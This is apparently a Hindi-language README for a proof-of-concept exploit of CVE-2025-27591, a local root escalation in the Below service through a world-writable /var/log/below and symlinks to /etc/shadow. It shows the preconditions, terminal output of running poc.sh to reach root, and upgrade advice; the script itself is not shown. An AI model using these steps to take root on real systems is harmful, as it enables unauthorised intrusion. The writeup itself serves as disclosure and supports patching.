
CVE-2025-27591 के लिए एक प्रूफ ऑफ कॉन्सेप्ट, Below < v0.9.0 में एक स्थानीय विशेषाधिकार वृद्धि
CVE-2025-27591 के लिए प्रूफ ऑफ कॉन्सेप्ट, एक कमजोरी जो स्थानीय सामान्य उपयोगकर्ताओं को सिमलिंक हमलों के माध्यम से अपने विशेषाधिकारों को रूट तक बढ़ाने की अनुमति देती है।
यह कमजोरी Below सेवा (v0.9.0 से पहले के संस्करण) को प्रभावित करती है। यह /var/log/below निर्देशिका को विश्व-लेखन योग्य अनुमतियों (0777) के साथ बनाता है, जिससे सामान्य स्थानीय उपयोगकर्ता प्रतीकात्मक लिंक को स्थानांतरित कर सकते हैं और /etc/shadow जैसी महत्वपूर्ण फाइलों में हेरफेर कर सकते हैं, जिसके परिणामस्वरूप रूट तक विशेषाधिकार वृद्धि होती है।
एक स्थानीय, सामान्य उपयोगकर्ता निम्न द्वारा रूट तक विशेषाधिकार बढ़ा सकता है:
/var/log/below/ में विश्व-लेखन योग्य अनुमतियाँ (0777) होनी चाहिए और इसमें error_root.log फ़ाइल होनी चाहिए।foo@victim:~$ ls -l /var/log/ | grep below
drwxrwxrwx 3 root root 4096 Jul 8 20:45 below
हमें sudoers स्तर पर विशेषाधिकारों की आवश्यकता होगी।
foo@victim:~$ sudo -l
Matching Defaults entries for jacob on victim:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User foo may run the following commands on victim:
(ALL : ALL) NOPASSWD: /usr/bin/below
एक बार हमारे पास poc.sh फ़ाइल होने पर, हम इसे आवश्यक अनुमतियाँ देंगे, इसे निष्पादित करेंगे, और हम root होंगे।
foo@victim:/tmp$ chmod +x poc.sh
foo@victim:/tmp$ ./poc.sh
evil@victim:/tmp# id
uid=0(evil) gid=0(root) groups=0(root)
Below v0.9.0 या उसके बाद के संस्करण में अपग्रेड करें, जो असुरक्षित chmod तर्क को हटाता है और systemd यूनिट सुविधाओं जैसे LogsDirectory=below पर निर्भर करता है।